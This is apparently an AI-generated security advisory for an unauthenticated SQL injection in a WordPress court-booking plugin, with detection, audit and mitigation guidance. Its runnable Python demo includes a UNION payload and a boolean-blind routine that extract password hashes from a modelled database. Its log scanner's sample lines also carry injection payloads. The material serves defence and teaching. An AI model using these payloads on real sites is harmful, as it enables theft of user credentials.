CVE-2026-1250 Overview
CVE-2026-1250 is a SQL Injection vulnerability in the Court Reservation – Manage Your Court Bookings Online plugin for WordPress. The flaw affects all versions up to and including 1.10.11. It stems from insufficient escaping of the user-supplied id parameter combined with a lack of query preparation, so unauthenticated attackers can append additional SQL to the plugin's existing database queries. Successful exploitation allows extraction of sensitive information from the WordPress database, including password hashes and other user data from the wp_users table.
Critical Impact
Unauthenticated remote attackers can extract sensitive database contents through injected SQL queries against vulnerable WordPress sites running the plugin.
Affected Products
- Court Reservation – Manage Your Court Bookings Online plugin for WordPress
- All plugin versions up to and including 1.10.11
- WordPress sites with the vulnerable plugin installed and activated
Discovery Timeline
- 2026-05-12 - CVE-2026-1250 published to NVD
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2026-1250
Vulnerability Analysis
The vulnerability is classified as SQL Injection [CWE-89]. It exists in the public-facing component of the Court Reservation plugin, specifically in the handling of the id parameter referenced in class-courtres-public.php. The plugin concatenates the user-supplied id value into a SQL statement without passing it through $wpdb->prepare(). Note that esc_sql() alone would not close this hole either: it only escapes characters that break out of a quoted string literal, and an id compared as an unquoted number needs no quote to escape, so the correct fix is a %d placeholder in $wpdb->prepare() (or an explicit integer cast). Attackers exploit the gap by injecting additional SQL clauses through the id parameter. The injected statement runs with the privileges of the WordPress database user, so any table that user can read, including wp_users, is exposed.
Root Cause
The root cause is improper neutralization of special elements used in an SQL command. The plugin developer relied on direct interpolation of the id request parameter into the query string. WordPress provides a parameterized query mechanism via $wpdb->prepare(), which coerces %d placeholders to integers and escapes %s placeholders before the statement is sent, but the vulnerable code path bypasses it. This omission allows attacker-controlled input to alter the structure of the SQL statement rather than merely supply a value to it.
Attack Vector
The attack vector is network-based and requires no authentication or user interaction. An attacker crafts an HTTP request to the vulnerable endpoint and supplies a malicious payload in the id parameter. Common techniques include UNION-based extraction to pull rows from arbitrary tables when query results are rendered in the page, and boolean- or time-based blind injection, which infers data one character at a time from whether a booking is returned or how long the response takes, when results are not directly reflected. The vulnerability impacts confidentiality, as reflected in the CVSS vector, which scores confidentiality impact only; integrity and availability are not affected.
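The following is an added example, not code from the plugin or from the advisory. It models the flawed and the hardened pattern in Python against an in-memory SQLite database so it can be run anywhere: lookup_vulnerable() pastes the id parameter into the SQL text the way the advisory describes, lookup_fixed() reproduces what $wpdb->prepare() does for a %d placeholder (PHP intval() semantics, then a bound parameter), and extract_blind() shows the boolean-based blind technique an attacker falls back to when query output is not reflected. The table courtres_bookings and its columns are assumptions; the wp_users table, user_login and user_pass are real WordPress names, but the hash values are constructed.

```python
import re
import sqlite3
import string

# Constructed in-memory stand-in for a WordPress database. courtres_bookings
# and its columns are assumed for illustration; this is not the plugin's schema.
SAMPLE_HASH = "$P$BexampleHashOnlyForIllustrationxx"


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE courtres_bookings (id INTEGER PRIMARY KEY, court TEXT, slot TEXT);
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO courtres_bookings VALUES (1, 'Court A', '2026-05-20 10:00');
        INSERT INTO courtres_bookings VALUES (2, 'Court B', '2026-05-20 11:00');
        INSERT INTO wp_users VALUES (1, 'admin', '{SAMPLE_HASH}');
        INSERT INTO wp_users VALUES (2, 'editor', '$P$BanotherIllustrativeHashValue');
    """)
    return db


def lookup_vulnerable(db, raw_id):
    """The flawed pattern: the request parameter is interpolated into the SQL
    text, so it can change the structure of the statement."""
    sql = "SELECT court, slot FROM courtres_bookings WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def php_intval(value):
    """Mimics PHP intval() as $wpdb->prepare() applies it for a %d placeholder:
    a leading integer is kept, anything else yields 0."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def lookup_fixed(db, raw_id):
    """The hardened pattern, modelling $wpdb->prepare('... WHERE id = %d', $id):
    the value is coerced to an integer and bound, never pasted into the SQL."""
    booking_id = php_intval(raw_id)
    return db.execute(
        "SELECT court, slot FROM courtres_bookings WHERE id = ?", (booking_id,)
    ).fetchall()


# UNION payload: same column count as the original SELECT, so the user rows
# come back alongside the booking rows.
UNION_PAYLOAD = "1 UNION SELECT user_login, user_pass FROM wp_users"


def extract_blind(db, length, charset=string.ascii_letters + string.digits + "./$"):
    """Boolean-based blind extraction through the vulnerable lookup: when the
    response only reveals whether a booking came back, the attacker recovers
    the admin password hash one character at a time with yes/no questions."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            probe = (f"1 AND (SELECT substr(user_pass, {pos}, 1) FROM wp_users "
                     f"WHERE ID = 1) = '{ch}'")
            if lookup_vulnerable(db, probe):  # booking 1 returned => guess correct
                recovered += ch
                break
        else:
            break  # character outside the charset: stop rather than guess
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", lookup_vulnerable(db, UNION_PAYLOAD))
    print("fixed:     ", lookup_fixed(db, UNION_PAYLOAD))
    print("blind:     ", extract_blind(db, 6))
```

Against the vulnerable lookup the UNION payload returns the booking plus every user_login/user_pass pair; against the fixed lookup the same payload degrades to the integer 1 and returns only booking 1. In the plugin the equivalent fix is `$wpdb->prepare( "SELECT ... WHERE id = %d", $id )`, with `$id` taken from the request without any prior concatenation into the query string.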
For technical details on the vulnerable code path, refer to the WordPress Court Reservation Source Code and the Wordfence Vulnerability Intelligence Advisory.
Detection Methods for CVE-2026-1250
Indicators of Compromise
- HTTP requests whose id parameter carries SQL keywords or metacharacters such as UNION SELECT, ORDER BY, single quotes, or comment sequences (--, #), possibly percent-encoded one or more times; a legitimate id is a plain integer.
- Web server access logs showing repeated requests to Court Reservation plugin endpoints with abnormally long or encoded id values.
- Unexpected database errors or slow query log entries originating from the plugin's PHP handlers.
- Outbound data transfer spikes following requests to vulnerable plugin URLs.
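An added example, not part of the original advisory, of turning the first two indicators into a check that can be run over web server access logs. It parses combined-format lines, pulls the id parameter out of the query string, undoes repeated percent-encoding, and flags values that are non-numeric, match injection signatures, are abnormally long, or were double-encoded. The log lines are constructed, and the /booking/ path is an assumed location for the plugin's front end, not a documented endpoint.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines (combined format). /booking/ is an assumed path.
SAMPLE_LOG = [
    '203.0.113.10 - - [12/May/2026:10:01:02 +0000] "GET /booking/?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/May/2026:10:01:09 +0000] "GET /booking/?id=42%20UNION%20SELECT%20user_login,user_pass%20FROM%20wp_users-- HTTP/1.1" 200 9876 "-" "sqlmap/1.8"',
    '198.51.100.7 - - [12/May/2026:10:01:11 +0000] "GET /booking/?id=42%27%20AND%20SLEEP(5)%23 HTTP/1.1" 500 312 "-" "sqlmap/1.8"',
    '198.51.100.7 - - [12/May/2026:10:01:15 +0000] "GET /booking/?id=42%2527%2520OR%25201%253D1 HTTP/1.1" 200 5120 "-" "curl/8.5"',
    '203.0.113.11 - - [12/May/2026:10:02:00 +0000] "POST /booking/ HTTP/1.1" 200 1000 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Signatures from the indicator list: UNION ... SELECT, ORDER BY, quotes and
# comment sequences, plus the sleep/benchmark calls used by time-based probes.
SQLI_RE = re.compile(
    r"(?i)\bunion\b[\s\S]*\bselect\b|\border\s+by\b|'|--|#|/\*|\bsleep\s*\(|\bbenchmark\s*\("
)
MAX_SANE_LEN = 32  # assumed ceiling: a booking id never needs this many characters


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding. Returns the value and the number of extra
    decode rounds needed beyond the one the server already did; more than zero
    means the request was double-encoded, a common filter-evasion trick."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def classify_id(raw_id):
    """Return the decoded id and the list of reasons it looks malicious (empty if clean)."""
    value, extra_rounds = fully_decode(raw_id)
    reasons = []
    if not value.isdigit():
        reasons.append("non-numeric")
    if SQLI_RE.search(value):
        reasons.append("sqli-signature")
    if len(value) > MAX_SANE_LEN:
        reasons.append("long")
    if extra_rounds:
        reasons.append("double-encoded")
    return value, reasons


def scan_access_log(lines):
    """One record per request whose id parameter looks like an injection attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # parse_qs performs the single decode the web server would also apply.
        for raw_id in parse_qs(url.query, keep_blank_values=True).get("id", []):
            value, reasons = classify_id(raw_id)
            if reasons:
                hits.append({"ip": m.group("ip"), "time": m.group("ts"), "path": url.path,
                             "status": m.group("status"), "id": value, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["reasons"], repr(hit["id"]))
```

The benign request (id=42) is not reported; the three requests from 198.51.100.7 are, and the last one is only caught because the decoder runs a second round and recovers the single quote hidden behind %2527. In production, narrow the path match to the plugin's real endpoints and group hits by source address to see the probe-then-extract sequence of a scanner.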
Detection Strategies
- Deploy web application firewall (WAF) rules that inspect the id parameter for SQL injection signatures targeting WordPress plugin endpoints.
- Enable MySQL or MariaDB general query logging for a bounded window to identify malformed queries originating from the plugin; the general log records every statement and is expensive on busy sites, so prefer a database audit plugin if the window must stay open for long.
- Audit installed plugin versions across WordPress fleets (for example with wp plugin list) and flag instances running 1.10.11 or earlier, comparing versions numerically rather than as strings.
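An added example, not from the advisory, of the fleet audit: it consumes output in the shape of `wp plugin list --format=json` collected from each site and reports every site carrying the plugin at 1.10.11 or earlier. It also shows why versions must be compared numerically: as strings, "1.9.2" sorts after "1.10.11" and a naive check would miss it. The fleet data is constructed, the slug court-reservation is an assumption, and 1.10.12 is a hypothetical later release used only to exercise the comparison; this page does not reference a fixed version.

```python
import json
import re

# Constructed per-site output in the shape of `wp plugin list --format=json`.
# The slug is assumed; 1.10.12 is hypothetical and only exercises the comparison.
SAMPLE_FLEET = {
    "sitea.example": json.dumps([
        {"name": "court-reservation", "status": "active", "update": "none", "version": "1.10.11"},
        {"name": "akismet", "status": "active", "update": "none", "version": "5.3"},
    ]),
    "siteb.example": json.dumps([
        {"name": "court-reservation", "status": "inactive", "update": "none", "version": "1.9.2"},
    ]),
    "sitec.example": json.dumps([
        {"name": "court-reservation", "status": "active", "update": "none", "version": "1.10.12"},
    ]),
    "sited.example": json.dumps([]),
}

LAST_VULNERABLE = "1.10.11"
PLUGIN_SLUG = "court-reservation"  # assumed slug


def parse_version(v):
    """Numeric tuple so that 1.10.11 sorts after 1.9.2; a plain string compare
    gets this wrong ('1.9.2' > '1.10.11' lexically)."""
    return tuple(int(x) for x in re.findall(r"\d+", v))


def is_vulnerable(version, last_vulnerable=LAST_VULNERABLE):
    return parse_version(version) <= parse_version(last_vulnerable)


def audit_fleet(fleet, slug=PLUGIN_SLUG):
    """Map site -> finding for every site where the plugin is installed at a
    vulnerable version. Inactive installs are still reported: the code is on
    disk and one click re-enables it, so remove it rather than leave it."""
    findings = {}
    for site, plugin_json in fleet.items():
        for plugin in json.loads(plugin_json):
            if plugin["name"] == slug and is_vulnerable(plugin["version"]):
                findings[site] = {"version": plugin["version"], "status": plugin["status"]}
    return findings


if __name__ == "__main__":
    for site, finding in audit_fleet(SAMPLE_FLEET).items():
        print(f"{site}: {PLUGIN_SLUG} {finding['version']} ({finding['status']})")
```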
Monitoring Recommendations
- Monitor authentication logs for logins to administrator accounts from new addresses and for new administrator account creation following suspicious plugin requests; the injection itself only reads data, so the follow-on abuse is an attacker cracking dumped password hashes offline and then logging in normally.
- Track HTTP 500 responses and PHP errors tied to the Court Reservation plugin namespace.
- Alert on database queries containing unusual INFORMATION_SCHEMA references coming from the WordPress application user.
How to Mitigate CVE-2026-1250
Immediate Actions Required
- Deactivate and remove the Court Reservation plugin until a patched version is verified and installed.
- Reconstruct what was read from the web server access logs and any query or audit logging that was enabled; MySQL and MariaDB keep no record of SELECT statements by default, so if the logs show injection attempts against the plugin, treat wp_users and wp_options as disclosed rather than waiting for proof.
- If exploitation is suspected, rotate all administrator passwords and invalidate active sessions, for example by regenerating the AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY and their SALT counterparts in wp-config.php, which logs every user out.
- Apply WAF virtual patching rules to block SQL injection payloads against the plugin's request handlers.
Patch Information
At the time of publication, the vendor advisory references versions up to and including 1.10.11 as vulnerable and no fixed release is named here. Site administrators should monitor the plugin's WordPress.org page and the Wordfence Vulnerability Intelligence Advisory for an updated release that introduces prepared statements via $wpdb->prepare(), and verify the installed version after updating rather than assuming the update applied.
Workarounds
- Restrict access to plugin endpoints using .htaccess or NGINX location rules that allow only trusted IP ranges; since the vulnerable component is the plugin's public booking front end, this also blocks legitimate visitors and is suitable only where bookings can be paused.
- Configure the WordPress database user with least-privilege permissions to reduce data exposure if exploitation occurs. WordPress needs broad rights on its own database, so this mainly limits what an injected query can reach in other databases and denies FILE or other global privileges; it does not protect wp_users itself.
- Enable a WAF with SQL injection signatures targeting WordPress query parameters.
# Example ModSecurity rule to block SQLi attempts against the id parameter
SecRule ARGS:id "@detectSQLi" \
"id:1002600,phase:2,deny,status:403,\
msg:'CVE-2026-1250 SQLi attempt against Court Reservation plugin',\
tag:'CWE-89'"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.